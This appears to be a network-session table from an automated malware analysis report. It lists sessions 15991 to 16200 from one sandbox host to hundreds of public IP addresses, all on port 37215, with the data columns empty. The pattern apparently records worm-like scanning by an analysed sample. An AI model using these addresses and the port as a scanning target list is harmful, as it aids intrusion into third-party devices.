                                                  15991192.168.2.1337630157.227.228.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15992192.168.2.1353932157.37.56.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15993192.168.2.1359040197.142.31.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15994192.168.2.1341298197.192.95.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15995192.168.2.133710841.159.73.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15996192.168.2.1344178157.229.238.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15997192.168.2.135662641.165.18.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15998192.168.2.135995041.138.16.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15999192.168.2.133871441.138.186.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16000192.168.2.1333772197.48.109.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16001192.168.2.1352884197.31.253.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16002192.168.2.1341336157.92.255.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16003192.168.2.1347932157.189.105.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16004192.168.2.134730890.194.120.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16005192.168.2.1350440157.39.136.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16006192.168.2.135474041.62.104.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16007192.168.2.133566441.122.48.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16008192.168.2.1351980157.58.79.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16009192.168.2.134899641.115.145.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16010192.168.2.134714043.82.199.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16011192.168.2.1335282145.21.67.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16012192.168.2.134855441.160.141.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16013192.168.2.134337041.107.246.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16014192.168.2.1347074205.244.52.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16015192.168.2.1349684157.90.111.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16016192.168.2.135544060.12.173.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16017192.168.2.135654039.19.82.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16018192.168.2.1345280197.152.72.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16019192.168.2.1339398197.69.127.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16020192.168.2.1340014197.71.72.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16021192.168.2.134442041.84.96.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16022192.168.2.135562641.187.236.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16023192.168.2.134723641.104.80.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16024192.168.2.1357944175.117.242.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16025192.168.2.1357360197.44.108.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16026192.168.2.1342536197.96.177.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16027192.168.2.1334490157.211.202.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16028192.168.2.1341026197.19.220.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16029192.168.2.1333522157.22.142.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16030192.168.2.1357850197.152.86.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16031192.168.2.1333484182.8.245.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16032192.168.2.1336386157.114.125.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16033192.168.2.133653873.91.226.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16034192.168.2.1340032197.60.208.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16035192.168.2.136058841.109.231.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16036192.168.2.1335358125.234.27.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16037192.168.2.135777641.129.92.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16038192.168.2.134337287.176.166.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16039192.168.2.135483041.121.63.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16040192.168.2.1342802157.54.7.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16041192.168.2.1354350157.125.111.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16042192.168.2.1353390197.201.250.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16043192.168.2.135371241.211.208.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16044192.168.2.1343088157.71.124.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16045192.168.2.1333604157.31.32.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16046192.168.2.1342304197.0.243.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16047192.168.2.1354784142.82.24.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16048192.168.2.1336326157.3.69.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16049192.168.2.1350492181.97.255.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16050192.168.2.1354768197.159.99.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16051192.168.2.133785041.255.159.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16052192.168.2.1348866157.238.48.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16053192.168.2.134936441.6.200.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16054192.168.2.1336236157.34.122.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16055192.168.2.1350086157.183.23.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16056192.168.2.1346428157.198.185.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16057192.168.2.1357602197.97.92.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16058192.168.2.1336138197.201.186.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16059192.168.2.133371841.251.126.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16060192.168.2.1345434163.236.156.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16061192.168.2.1332894196.179.149.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16062192.168.2.1339896157.64.145.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16063192.168.2.135217841.25.254.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16064192.168.2.1346034157.29.188.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16065192.168.2.135986863.92.71.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16066192.168.2.1338126157.228.79.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16067192.168.2.1357888197.245.135.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16068192.168.2.135720031.182.103.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16069192.168.2.134470041.233.147.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16070192.168.2.134325241.192.18.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16071192.168.2.1340550103.130.85.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16072192.168.2.135507841.210.158.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16073192.168.2.1347388157.120.43.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16074192.168.2.1358066197.211.37.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16075192.168.2.135115041.156.39.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16076192.168.2.1351024169.114.52.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16077192.168.2.134001865.36.187.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16078192.168.2.1351670197.74.148.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16079192.168.2.134718041.137.26.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16080192.168.2.1359828197.80.94.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16081192.168.2.135854219.36.14.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16082192.168.2.1334626157.158.105.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16083192.168.2.1351482185.78.46.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16084192.168.2.1348608157.210.58.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16085192.168.2.1348968117.7.17.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16086192.168.2.1349676197.245.215.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16087192.168.2.1352612157.124.161.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16088192.168.2.134852441.40.57.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16089192.168.2.1345566197.144.207.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16090192.168.2.135182041.255.100.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16091192.168.2.1336950197.11.7.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16092192.168.2.133839041.78.201.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16093192.168.2.134291241.193.250.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16094192.168.2.1359124157.206.61.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16095192.168.2.1345500157.181.9.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16096192.168.2.1340654157.195.171.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16097192.168.2.1347686157.101.43.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16098192.168.2.135088441.73.214.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16099192.168.2.1342638180.161.225.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16100192.168.2.1337756197.16.175.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16101192.168.2.1357402157.147.133.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16102192.168.2.1347432197.79.115.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16103192.168.2.135992818.154.166.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16104192.168.2.135192241.69.246.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16105192.168.2.1349282157.179.126.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16106192.168.2.1338414157.169.186.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16107192.168.2.135888441.71.19.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16108192.168.2.134724241.222.201.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16109192.168.2.1345246159.123.186.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16110192.168.2.135177641.70.185.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16111192.168.2.1335722176.198.100.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16112192.168.2.1342354157.115.225.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16113192.168.2.134915041.236.181.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16114192.168.2.1335358143.107.164.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16115192.168.2.134737041.206.211.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16116192.168.2.1340482197.62.24.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16117192.168.2.134194841.128.173.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16118192.168.2.1340650157.181.97.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16119192.168.2.134301275.85.51.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16120192.168.2.133565834.175.250.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16121192.168.2.135939861.119.210.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16122192.168.2.1349424157.121.66.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16123192.168.2.1354848197.200.120.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16124192.168.2.1345496157.30.182.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16125192.168.2.1353278197.123.147.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16126192.168.2.134257641.111.251.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16127192.168.2.1354966107.15.94.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16128192.168.2.1335128157.95.104.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16129192.168.2.133585441.0.87.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16130192.168.2.1357664121.72.214.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16131192.168.2.1336254157.81.147.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16132192.168.2.1355306197.90.255.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16133192.168.2.1357642197.34.66.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16134192.168.2.134761041.218.21.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16135192.168.2.1343226157.180.118.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16136192.168.2.1339966197.97.90.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16137192.168.2.1337132197.227.195.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16138192.168.2.1347000197.106.9.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16139192.168.2.1359456197.61.255.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16140192.168.2.1350600197.117.113.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16141192.168.2.1333948197.3.119.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16142192.168.2.1358906157.97.65.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16143192.168.2.1356936100.250.23.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16144192.168.2.134483441.250.129.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16145192.168.2.135448041.211.86.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16146192.168.2.1345046157.152.47.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16147192.168.2.1333106157.201.91.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16148192.168.2.1356410157.8.227.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16149192.168.2.133983241.53.126.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16150192.168.2.1335516188.84.238.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16151192.168.2.1358196197.15.214.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16152192.168.2.135502671.31.224.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16153192.168.2.1343098197.69.183.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16154192.168.2.133840820.169.100.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16155192.168.2.1360444197.38.62.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16156192.168.2.1359286197.25.46.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16157192.168.2.1355168157.86.61.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16158192.168.2.1351428197.5.80.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16159192.168.2.1337458197.238.176.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16160192.168.2.135835441.42.124.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16161192.168.2.133920041.152.171.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16162192.168.2.1360020197.234.237.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16163192.168.2.1358072109.25.154.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16164192.168.2.1335704157.197.177.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16165192.168.2.13554944.229.137.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16166192.168.2.133528081.39.31.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16167192.168.2.1338858157.180.102.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16168192.168.2.1337574157.166.223.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16169192.168.2.1353898114.79.10.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16170192.168.2.1360920157.147.33.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16171192.168.2.1345874157.61.64.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16172192.168.2.1335260197.49.223.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16173192.168.2.1356460197.64.137.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16174192.168.2.135178641.75.110.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16175192.168.2.1353624157.161.131.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16176192.168.2.134618041.235.153.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16177192.168.2.1339394157.221.85.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16178192.168.2.134412641.11.250.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16179192.168.2.1333936157.123.101.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16180192.168.2.133668867.10.70.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16181192.168.2.1353272197.194.240.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16182192.168.2.1346780153.133.178.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16183192.168.2.1360608197.250.245.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16184192.168.2.1349912197.33.254.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16185192.168.2.1357616157.75.253.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16186192.168.2.1348240124.92.154.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16187192.168.2.1360704197.196.58.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16188192.168.2.133680041.209.171.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16189192.168.2.134342420.223.123.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16190192.168.2.1335230157.103.20.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16191192.168.2.1333896197.30.162.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16192192.168.2.135589441.47.123.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16193192.168.2.135221241.220.89.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16194192.168.2.1339032197.156.169.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16195192.168.2.1354328165.111.253.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16196192.168.2.134905241.68.227.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16197192.168.2.1344410157.216.57.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16198192.168.2.1352242199.202.27.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16199192.168.2.135153827.249.234.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16200192.168.2.1349538157.43.174.13837215
